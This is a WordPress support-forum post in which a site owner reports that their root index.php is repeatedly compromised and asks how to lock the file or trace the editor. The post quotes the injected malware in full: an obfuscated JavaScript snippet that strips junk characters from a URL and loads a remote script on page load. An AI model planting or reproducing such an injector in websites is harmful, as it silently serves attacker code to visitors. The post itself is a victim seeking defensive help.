Main index.php constantly being hacked
-
Over the last few weeks, I have had multiple intrusions into my site. Mainly the main index.php in the root WP directory.
Every few days, I find new malicious code in there. Initially, it was just IFRAMEs, but now I’m seeing this Javascript code in there:
<script>/*GNU GPL*/ try{window.onload = function(){var Ufxkuzrk298 = document.createElement('script');Ufxkuzrk298.setAttribute('type', 'text/javascript');Ufxkuzrk298.setAttribute('id', 'myscript1');Ufxkuzrk298.setAttribute('src', 'h!@t^t&^#p&:$@/$)#$/@!!a^@l)$)l(&^y@#e(&(!s(^)-#(c$)&&o&m(@#&.)e@$x($!p#$!&e)^^d#(i&#a^.&&@c#o$)m$!).$m#&((a)))k!@&t#)o!#)o&b^(-$c()!&o)!m!&.&)j^a(&c!k^#(f!@#r&(o($s^)@t#$^m@o((v!(#@i(e@@s$^(.^^&&r@u&&)):!8#&^0#)8!0()(^@/)!&!)c(^h(#!i!#$n^@^a$z($.(@^c)$^o##)m@)/(^&c^h))^i#&!@n&#&a$(z!.)!c$o#$m@@$/#$$^g@o)&o^#^g$!l#@##e(.@^&c&&o^m!)&!/&#b#$(e&)s$!@t!)b#$^u(((y(@#.))$c@&o##!^m&!$/@@&5(^^1@&j(!o)!@^b)#.(c#(^#!o)!m)&#/&@&'.replace(/&|\$|#|\!|\(|\)|@|\^/ig, ''));Ufxkuzrk298.setAttribute('defer', 'defer');document.body.appendChild(Ufxkuzrk298);}} catch(e) {}</script>I have already made all the initial steps to try to remove this. I have the latest version of WP running, I’ve changed all my passwords, and this is still happening.
Does anybody know if there is a way to just lock down the index.php file from being edited? Or a way to track who edits the file so I can block the IP?
Thanks
- The topic ‘Main index.php constantly being hacked’ is closed to new replies.